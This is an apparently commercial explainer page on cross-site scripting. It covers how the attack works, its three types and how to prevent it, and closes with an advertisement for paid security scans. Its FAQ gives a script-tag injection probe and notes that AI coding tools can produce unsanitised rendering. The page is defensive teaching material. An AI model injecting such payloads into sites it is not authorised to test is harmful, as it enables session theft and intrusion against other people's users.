What is Cross-Site Scripting (XSS)?
An attack where malicious code is injected into a website, running in other users' browsers to steal data or hijack sessions.
In plain English
Imagine someone slips a note into a library book that says 'give me your wallet.' Every person who reads that page follows the instruction because they trust the library. XSS works the same way — attackers inject code into a trusted website, and visitors' browsers execute it because they trust the site.
How it works
An attacker finds an input field — a comment box, search bar, or profile name — that doesn't sanitize input. They enter JavaScript code instead of normal text. When another user views the page, their browser executes the injected code. This code can steal login cookies, redirect users to phishing sites, or modify the page to capture passwords.
Types of XSS
Stored XSS: the malicious script is saved in your database (via a comment or profile field) and served to every user who views that content. Reflected XSS: the script is included in a URL parameter and only executes when someone clicks a crafted link. DOM-based XSS: the script manipulates the page's JavaScript on the client side without touching the server.
How to prevent it
Never insert user-provided data directly into HTML. Use your framework's built-in escaping — React does this by default with JSX. For cases where you must render HTML, use a sanitization library like DOMPurify. Set a Content-Security-Policy header to restrict which scripts can execute. Never use dangerouslySetInnerHTML with user content.
Why AI-built apps are vulnerable
AI coding tools sometimes use innerHTML, dangerouslySetInnerHTML, or template literals to render user content without sanitization. They may also disable Content-Security-Policy headers to avoid development issues, leaving them off in production.
Frequently asked questions
Can React apps get XSS attacks?
React escapes content by default, which prevents most XSS. But if you use dangerouslySetInnerHTML, create elements with document.createElement, or set href attributes to user-provided URLs (javascript: protocol), you're still vulnerable.
How do I test for XSS?
Try entering <script>alert('test')</script> in every input field and URL parameter. Use OWASP ZAP (https://www.zaproxy.org/), a free open-source security scanner maintained by the OWASP Foundation, to automate testing. According to the OWASP Top 10, injection flaws remain one of the most critical web security risks. Our security scan checks for XSS vulnerabilities automatically.
Check your app
Get a professional review of your app at a fixed price.
Security Scan
Black-box review of your public-facing app. No code access needed.
- OWASP Top 10 checks
- SSL/TLS analysis
- Security headers
- Expert review within 24h
Code Audit
In-depth review of your source code for security, quality, and best practices.
- Security vulnerabilities
- Code quality review
- Dependency audit
- AI pattern analysis
Complete Bundle
Both scans in one package with cross-referenced findings.
- Everything in both products
- Cross-referenced findings
- Unified action plan
100% credited toward any paid service. Start with an audit, then let us fix what we find.
Worried about cross-site scripting (xss) in your app?
Get a professional code audit ($19) or book a free call to discuss your concerns.